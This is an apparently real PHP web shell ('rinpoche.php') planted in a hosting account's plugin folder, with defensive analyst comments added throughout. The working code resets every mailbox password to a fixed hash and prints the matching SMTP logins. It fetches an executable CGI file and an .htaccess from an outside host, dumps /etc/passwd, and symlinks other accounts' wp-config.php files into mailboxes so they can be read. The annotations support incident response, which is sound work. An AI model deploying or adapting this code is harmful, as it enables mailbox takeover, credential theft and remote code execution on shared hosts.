| Direktori : /home/bestphotography/www/plugins/flatpickr/ |
| Current File : /home/bestphotography/www/plugins/flatpickr/rinpoche.php |
<?php
#ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL);
//self destruct
//.lock file to prevent from running again
/*
GLOBALS
*/
// Analyst note: no authentication or access check appears anywhere in this
// file, so every action below is available to whoever can request the script.
// get_current_user() returns the owner of this PHP file, i.e. the hosting
// account the file was dropped into.
$user = get_current_user();
// Account home directory: parent of the web server's document root, with any
// 'public_html' substring removed from the resulting path.
$home_dir = str_replace('public_html','',dirname($_SERVER['DOCUMENT_ROOT']));
/**
 * Lists the entries of $path whose names look like a domain name.
 *
 * Entries named '.' or '..', and entries whose name contains 'dovecot', are
 * skipped. Entries are matched by name only; nothing checks that an entry is
 * itself a directory.
 *
 * @param string $path Directory to scan (the caller passes "$home_dir/mail").
 * @return array Alphabetically sorted matching names; empty when $path is not
 *               a readable directory or cannot be opened.
 */
function get_mail_domains($path) {
if (!is_dir($path) || !is_readable($path)) {
return array();
}
// '@' suppresses the warning a failed opendir() would otherwise emit.
$dh = @opendir($path);
if (!$dh) {
return array();
}
$domains = array();
while (($dir = readdir($dh)) !== false) {
if ($dir == '.' || $dir == '..' || strstr($dir,'dovecot')) {
continue;
}
$dir = trim($dir);
// Case-insensitive hostname shape: label, optional extra labels, alphabetic TLD.
if (preg_match('/^[a-z0-9-]+\.(?:[a-z0-9-]{2,}\.)*[a-z]{2,}$/i', $dir)) {
$domains[] = $dir;
}
}
closedir($dh);
sort($domains);
return $domains;
}
//print_r(get_mail_domains("$home_dir/mail"));
// Enumerate the mail domains stored under the account's mail directory.
$domains = get_mail_domains("$home_dir/mail");
// Only the first domain in sorted order is used for the rest of the script.
// When the scan returned nothing, index 0 does not exist and $domain is null.
$domain = $domains[0];
// Per-domain credential file and mailbox root targeted by the functions below.
// NOTE(review): this <home>/etc/<domain>/shadow plus <home>/mail/<domain>/
// layout looks like a cPanel-style hosting account; confirm against the host.
$shadow_file = "$home_dir/etc/$domain/shadow";
$mail_users = "$home_dir/mail/$domain/";
//die();
//mail users
/**
 * Returns the mailbox names of the selected domain.
 *
 * Reads the global $mail_users path and returns the base name of every
 * subdirectory directly beneath it. The globals $user, $domain and $home_dir
 * are declared but not used in this function.
 *
 * @return array Directory base names (one per mailbox directory found).
 */
function get_mail_users()
{
global $user;
global $domain;
global $home_dir;
global $mail_users;
// GLOB_ONLYDIR limits the match to directories.
$dirs = glob($mail_users . '/*', GLOB_ONLYDIR);
$users = array_map('basename', $dirs); // Just names
return $users;
}
//generate shadow with mail users
/**
 * Writes (or prints commands to write) one shadow-format line per mailbox,
 * all carrying the same hard-coded password hash.
 *
 * Analyst note: the hash literal starts with '$1$', the MD5-crypt prefix. After
 * this runs, every mailbox of the domain shares one credential, so a shadow
 * file in which all entries have an identical hash field is a strong indicator
 * of this tool. Treat every mailbox password as compromised, restore or reset
 * them, and review mail logs for use of the accounts after the rewrite.
 *
 * @param array $users  Mailbox names to write entries for.
 * @param bool  $manual TRUE: only print shell commands that would append the
 *                      entries. Otherwise: append to the global $shadow_file
 *                      directly and print one line per mailbox.
 * @return void
 */
function rewrite_shadow($users,$manual)
{
global $shadow_file;
global $domain;
//titles
if ($manual === TRUE)
{
// Printed command would truncate the shadow file before the appends below.
echo "<pre>echo -n '' > $shadow_file;";
}
else
{
echo "SMTP FOUND:<br>";
}
foreach ($users as $user)
{
if ($manual === TRUE)
{
// The entry is base64-encoded so it can be embedded in the printed command.
$user_line = base64_encode($user.':$1$Sn2XsHof$rLEoKEFhLjTH6SlKbRo5M0:20442::::::');
//echo "<pre>echo $user_line | base64 -d >> $shadow_file;</pre>";
echo "printf '%s\\n' \"$user_line\" | base64 -d >> \"$shadow_file\";";
echo "printf '%s\\n' >> \"$shadow_file\";";
}
else
{
// Prints host|login|<string>|587 for each mailbox.
// NOTE(review): presumably the third field is the plaintext matching the
// hard-coded hash and 587 is the mail submission port; confirm.
echo "mail.$domain|$user@$domain|laughingbatman|587<br>";
// Appends the entry for this mailbox; the return value is not checked here.
file_put_contents($shadow_file, "$user:\$1\$Sn2XsHof\$rLEoKEFhLjTH6SlKbRo5M0:20442::::::\n", FILE_APPEND);
}
}
echo "</pre>";
}
//password reset for all mail users + smtp
/**
 * Replaces the domain's mail shadow file with entries using one fixed hash.
 *
 * Analyst note: when the shadow file is readable it is truncated first, so the
 * original password hashes are destroyed and can only be recovered from a
 * backup. The file's modification time and the web access log entry for this
 * script bound the time of the reset.
 *
 * Flow: print the target path and a link to port 2096 on the domain, truncate
 * the file, call rewrite_shadow() for every mailbox, then confirm the write by
 * searching the file for a fragment of the hard-coded hash. If the fragment is
 * missing, rewrite_shadow() is called again in manual mode, which only prints
 * shell commands.
 *
 * @return void
 */
function shadow()
{
global $user;
global $domain;
global $home_dir;
global $shadow_file;
echo "READING :: $shadow_file <br>
<a href='https://".rtrim($domain,'/').":2096' target='_blank'>=>WRBMAIL<=</a>
<br><br>";
// if readable and not empty choose what user rip(.Trash) + confirm modifications
//reset all users for the all users
if (is_readable($shadow_file)) {
//echo file_get_contents($shadow_file);
echo "==>RESETING ALL USERS<br>";
// Destructive step: existing entries are discarded before any new ones exist.
file_put_contents($shadow_file,''); //reset file
$users = get_mail_users();
rewrite_shadow($users,FALSE);
//check if rewrite successful
if(!strstr(file_get_contents($shadow_file),'rLEoKEFhLjTH6SlKbRo5M0'))
{
echo "[x] REWRITE FAILED manual cmd:<br>";
rewrite_shadow($users,TRUE);
return;
}
else {echo "==>REWRITE SUCCESSFUL !<br>";}
}
else { echo "Cannot read $shadow_file (permissions/CageFS)<br>"; }
}
/**
 * Empty stub: returns immediately and has no effect.
 *
 * @return void
 */
function exploit()
{
return;
}
/**
 * Downloads two remote files into the script's working directory.
 *
 * Analyst note: the first download is saved as 'ra.sa' and made executable
 * (0755); the second is saved as '.htaccess' (0644) and overwrites any
 * .htaccess already present. Neither download is verified in any way. The
 * remote content is not visible here; presumably the .htaccess makes the web
 * server run 'ra.sa' as CGI (confirm from a recovered copy).
 * Indicators on a host: a file named 'ra.sa' next to this script, an
 * unexpectedly modified .htaccess, and outbound requests to the host named in
 * the two URLs below. Both downloads use file_get_contents() on a URL, which
 * PHP only permits when allow_url_fopen is enabled.
 *
 * If 'ra.sa' already exists, only the link to it is printed and nothing is
 * downloaded.
 *
 * @return void
 */
function deploycgi() {
// Remote URLs (replace with your sources)
$cgi_url = 'https://www.magicaldreams.in//upload/media/rab.txt';
$htaccess_url = 'https://www.magicaldreams.in//upload/media/htaccess';
$cgi_path = 'ra.sa';
$htaccess_path = '.htaccess';
// Print the cgi url for quick access
// $protocol, $host and $dir are computed but never used below.
$protocol = isset($_SERVER['HTTPS']) ? 'https://' : 'http://';
$host = $_SERVER['HTTP_HOST'];
$dir = dirname($_SERVER['PHP_SELF']); // Strips 'rinpoche.php'
// Site-relative link to the dropped file (the literal ends with " \n").
$final_url = dirname(getenv('SCRIPT_NAME')) . "/$cgi_path \n";
if (file_exists($cgi_path )) {
echo "<br><a href='$final_url' target='_blank'>CGI AVAILABLE</a>";
return;
}
// Download CGI with 755 perms
// '@' hides the warning a failed fetch would otherwise print.
$cgi_content = @file_get_contents($cgi_url);
if ($cgi_content !== false) {
file_put_contents($cgi_path, $cgi_content);
chmod($cgi_path, 0755);
echo "✅ CGI downloaded: $cgi_path (755)\n";
} else {
echo "❌ Failed to download CGI\n";
return;
}
// Download .htaccess with 644 perms
$htaccess_content = @file_get_contents($htaccess_url);
if ($htaccess_content !== false) {
// Replaces any existing .htaccess in this directory without a backup.
file_put_contents($htaccess_path, $htaccess_content);
chmod($htaccess_path, 0644);
echo "✅ .htaccess downloaded: $htaccess_path (644)\n" ;
} else {
echo "❌ Failed to download .htaccess\n";
}
echo "<br><a href='$final_url' target='_blank'>CGI AVAILABLE<br></a>";
}
/**
 * Prints (does not run) an 'ln -s' command that would link /etc/passwd into
 * the given mailbox's cur/ directory under a message-like file name.
 *
 * No call to this function is visible in this file. The globals $user and
 * $shadow_file are declared but not used.
 *
 * @param string $mail_user Mailbox directory name inserted into the printed path.
 * @return void
 */
function manual_command_gen($mail_user)
{
global $user;
global $domain;
global $home_dir;
global $shadow_file;
echo "passwd sym :<hr>";
echo "ln -s /etc/passwd $home_dir/mail/$domain/$mail_user/cur/1738133538.M542500P1570694.br.shodan.io,S=800,W=369:2,S";
echo "<br><br>";
}
/* MAIN **
$users = get_mail_users();
echo count($users);
echo rewrite_shadow($users);
exit();
*/
// Analyst note: shadow() is called unconditionally, so simply requesting this
// file (any method, no parameters) performs the shadow-file rewrite. Each hit
// on this script in the web access log is therefore a candidate reset time.
shadow();
//deploycgi();
// $mail_users changes meaning here: it held the mailbox root path and now
// holds the list of mailbox names that the HTML forms below iterate over.
$mail_users = get_mail_users();
?>
<!DOCTYPE html>
<html>
<head>
<title>RINPOCHE</title>
<style>
body { font-family: monospace; margin: 40px; }
textarea { width: 100%; height: 300px; font-family: monospace; font-size: 14px; }
button { width: 100%; padding: 15px; font-size: 16px; background: #007cba; color: white; border: none; cursor: pointer; }
pre { background: #f4f4f4; padding: 20px; white-space: pre-wrap; }
</style>
</head>
<body>
<h2>Sys users</h2>
<form method=post><button name=cgi>deploy cgi</button></form>
<form method=post><button name=del>🗑️ Clean</button></form>
<form method="POST">
<textarea name="users" placeholder="data">
<?php
// Analyst note: the base64 literal decodes to /etc/passwd. The file's content
// is written into the textarea without escaping and becomes the default value
// of the 'users' field handled further down. Encoding the path this way hides
// it from a plain-text search of the source, so scanners should decode base64
// literals before matching on paths.
echo file_get_contents(base64_decode('L2V0Yy9wYXNzd2Q='));?>
</textarea><br><br>
<input type="text" value="public_html/wp-config.php" name="file_to_rip">
<select name="mail_users" id="mail_users" required>
<?php
// One <option> per mailbox name collected by get_mail_users(). The names are
// directory names written into the markup without any HTML escaping.
foreach ($mail_users as $usermail) {
echo "<option value='$usermail'>$usermail</option>";
}
?>
</select>
<button type="submit">START SYMLINKING CONFS</button>
</form>
<form method="POST">
<input type='text' name='symfile' value="/etc/passwd">
<input type='text' name='symetc' hidden="" value="sym for full users">
<select name="mail_users" id="mail_users" required>
<?php
// Same mailbox list as the first form: one <option> per mailbox directory
// name, written into the markup without any HTML escaping.
foreach ($mail_users as $usermail) {
echo "<option value='$usermail'>$usermail</option>";
}
?>
</select>
<button type="submit">SYMLINK passwd</button>
</form>
<?php
//config symlinking
// Analyst note (handler for the first form): for every submitted line it takes
// the text before ':x:' as an account name, builds the path
// <parent of this account's home>/<account>/<file_to_rip>, and creates a
// symlink to that path inside the chosen mailbox's cur/ directory under a
// message-like file name. Presumably the linked file is then meant to be read
// as a message in that mailbox (confirm against mail server behaviour).
// All three POST fields go into file paths without validation.
// Defensive checks: search the account's mail tree for symlinks, especially
// names containing '1738133538.' and '.br.shodan.io', and list where they
// point; keep each account's home directory and configuration files unreadable
// to other accounts; consider adding symlink to PHP's disable_functions.
if ($_POST['users'])
{
$passwd_var = $_POST['users'];
$file_to_rip = $_POST['file_to_rip'];
$mail_user = $_POST['mail_users'];
//clear inbox
//echo "<br>rm $home_dir/mail/$domain/$mail_user/cur/* <br>";
#echo "symlink() available.<br>";
$lines = explode("\n", $passwd_var);
echo "<pre>";
foreach ($lines as $line)
{
// Account name = everything before the first ':x:' on the line.
$user_psswd_exploded = explode(':x:',$line);
$user_psswd = $user_psswd_exploded[0];
//print("$user_psswd<br>");
;
// 15 characters drawn from a shuffled A-Z0-9 alphabet, used as a unique file-name part.
$msgid = strtoupper(substr(str_shuffle('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'),0,15));
// Link location: fixed numeric prefix, random part, fixed suffix.
$trash_mail = "$home_dir/mail/$domain/$mail_user/cur/1738133538.$msgid.br.shodan.io,S=357,W=369:2,S";
///home/$i/public_html/wp-config.php
// Removes this account's name from its own home path to get the shared parent.
$home_only = str_replace($user,'',$home_dir);
$symfile = "$home_only$user_psswd/$file_to_rip";
if (function_exists('symlink'))
{
echo "RIP : $symfile<br>";
#break;
// The result of symlink() is not checked.
symlink($symfile, $trash_mail);
//echo "$symfile => $trash_mail<br>";
}
elseif (function_exists('exec'))
{
// generate cmd from the textarea data
// Only prints a message; nothing is executed in this branch.
echo "exec() available.";
}
else
{
//echo "symlink()/exec() disabled (e.g., safe mode or hosting restrictions).";
// Prints the equivalent shell command instead of creating the link.
echo "ln -s $symfile $trash_mail;";
}
}
echo "</pre>";
}
// Analyst note (handler for the "Clean" button): deletes this script and the
// two files deploycgi() writes, all relative to the working directory. The
// .htaccess is removed whether or not it existed before the tool ran.
// Nothing here restores the shadow file or removes the symlinks created in
// mail directories, so a missing script does not mean a clean account: rely on
// web access logs, the shadow file's state and backups when triaging.
if(isset($_POST['del']))
{
unlink(__FILE__);
unlink('.htaccess');
unlink('ra.sa');
}
// Handler for the "deploy cgi" button: any POST carrying a 'cgi' field triggers
// the remote download performed by deploycgi(); no further check is made.
if(isset($_POST['cgi']))
{
deploycgi();
}
//passwd symlinking
// Analyst note (handler for the second form): creates one symlink in the
// chosen mailbox's cur/ directory pointing at the path posted in 'symfile'.
// The form pre-fills /etc/passwd, but the posted value is used verbatim, so
// the target can be any path. $etc (which decodes to /etc/passwd) is assigned
// but not used in the code visible here.
// Defensive checks: look for symlinks in mail directories whose names contain
// '1738133538.' and '.br.shodan.io', and record their targets before removal.
if ($_POST['symetc']) {
$symfile= $_POST['symfile']; // if isset checkbox use symfile else use $etc encrypted b64
$etc = base64_decode('L2V0Yy9wYXNzd2Q=');
//$etc = '/etc/named.conf';
//define the user to target
//$mail_user = 'admin';
$mail_user = $_POST['mail_users'];
// 15 characters drawn from a shuffled A-Z0-9 alphabet, used as a unique file-name part.
$msgid = strtoupper(substr(str_shuffle('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'),0,15));
$trash_mail = "$home_dir/mail/$domain/$mail_user/cur/1738133538.$msgid.br.shodan.io,S=80000000,W=800000000:2,S";
if (function_exists('symlink'))
{
echo "symlink() available.<br>";
// The result of symlink() is not checked; the link path is printed either way.
symlink($symfile, $trash_mail);
//@touch($trash_mail);
echo "$trash_mail";
}
elseif (function_exists('exec'))
{
// generate cmd from the textarea data
// Only prints a message; nothing is executed in this branch.
echo "exec() available.";
}
else
{
echo "symlink()/exec() disabled (e.g., safe mode or hosting restrictions). MANUAL COMMAND:<br>";
echo "<pre>ln -s $symfile $trash_mail;</pre>";
}
}
?>
</body>
</html>
<?php
//unlink(__FILE__);